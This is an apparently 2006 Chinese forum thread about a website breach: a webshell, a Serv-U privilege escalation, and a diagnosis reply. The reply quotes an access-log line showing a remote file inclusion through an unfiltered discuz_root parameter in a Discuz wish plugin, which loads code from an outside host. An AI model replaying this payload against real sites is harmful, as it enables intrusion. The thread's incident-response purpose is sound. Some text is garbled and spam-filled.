25ba.com漏洞攻击记录

应该是222.172.132.130，拿到一个WEBSHELL（文件名/bbs/ring04h.php，现已经不存在），通过serv-u提权，整个虚拟主机上的站都被他看了看。整个服务器危险啊。。。

看都看晕了...还解什么 啊.......

谢谢21楼的`  我又仔细看了下`

估计也是这个问题！

但是 你说  /bbs/ring04h.php不在`了`` 我就不清楚了

按道理  我恢复的时候  只是把原来的文件全部上传上去了


如果问题存在 应该依然存在的`

:L

眼睛都花了。。。。。

是从这里进去的,利用一个未过滤的变量discuz_root,远程文件包含漏洞
222.172.132.130 - - [21/Oct/2006:01:09:51 +0800] "GET /bbs/wish.php?discuz_root=http://zhaoshang.sohu.com/cc.txt? HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

赶紧卸掉你的什么许愿的插件,不知道谁修改的一个愚蠢的漏洞,discuz_root居然没过滤.应该就在wish.php的前几行，这个应该是个常量的.
我们已经发了好多次公告了,但是还是有相当一部分站点在使用这个插件.

楼主可以把被入侵的机器的账户信息告诉给我们的安检的同事.先卸掉那个插件,细翻番论坛目录下忻挥衅渌?膚ebshell,还有有没有上传其他用于提升的exploit


另外这个zhaoshang.sohu.com也不知道谁管理的，发现2三次入侵事件都和它有关。可能早已经被own了。

[ 本帖最后由 cnfreeos 于 2006-12-30 19:16 编辑 ]

支持楼上下~~真强啊~~!!!

你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!你太有才了!!!!!!!

楼主 发这个  有嘛意思  管我们P事

看不明白!看不明白!